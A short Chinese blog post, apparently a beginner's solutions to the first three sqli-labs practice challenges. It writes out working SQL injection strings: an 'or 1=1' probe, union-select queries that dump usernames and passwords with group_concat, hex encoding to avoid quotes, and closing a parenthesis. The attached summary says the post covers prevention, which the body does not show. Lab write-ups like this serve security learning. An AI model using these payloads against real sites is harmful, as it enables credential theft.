sqli-labs做题解析

本文介绍了SQL注入的基本原理,展示了利用和防止注入攻击的方法,包括利用'or1=1#'技巧,十六进制编码处理,以及代码补全与括号使用。重点讲解了如何改进代码以增强安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这是一些基本语法

1

先用一些 ?id=1' or 1=1 #   ?id=17' or 1=1 # 等确定他的数量

 

最后用函数的套用将所有数据链接一起显示

?id=-1’ union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users–+ 

 2

这个和第一题一样不过这个是去除 '  引发的不必要错误 只需将数据改成 0x 形势十六进制这样就不用使用引号(将 ~ 改成7e)

 3

这个先用 ?id=1

 发现有错误即那个id=1有括号说明这个可能是原来那个前面可能也有括号即未闭合

所以我们直接上代码并加上括号补充 

?id=-1’ )union select 1,2,group_concat(username,0x3a,password) from users–+ 

 怎弄说这个我也是学的半迷糊,写的确实不咋地,希望下次努力吧

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值